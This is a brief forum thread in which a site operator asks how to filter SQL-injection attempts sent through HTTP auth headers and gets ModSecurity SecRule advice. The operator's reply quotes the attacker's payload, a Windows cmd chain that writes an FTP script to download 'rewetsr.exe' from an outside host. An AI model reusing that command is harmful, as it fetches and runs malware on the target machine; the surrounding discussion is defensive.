Filtering Hack Attempts Via Http Auth

[kule]

Is there a way I can filter attempts to hack via http auth? I'm getting http auth requests which are trying to use SQL Injection with the login/username.

It's not getting anywhere but I would like to stop the request before it reaches the application if possible? I tried using SecFilter but that doesn't seem to stop it (I assume that it's just looking at the actual request string rather than the http auth details)

EDIT: Apologies, feel free to move this in to general. I didn't mean to put this in Features/Feedback

 

[mistwang]

what secfilter rule you used? it should work, it can match pattern against any http request header.

 

[kule]

I was using

SecFilter "rewetsr"

This is the command that was coming through (after a load of unicode characters):

cmd /c echo open 1.1.1.1 21 > o&echo user 1 1 >> o &echo get rewetsr.exe >> o &echo quit >> o &ftp -n -s'

 

[mistwang]

use SecFilterSelective or new "SecRule" directive.

 

[kule]

Ok so if I read this right something like:

SecRule REMOTE_USER "rewetsr" log,deny,status:403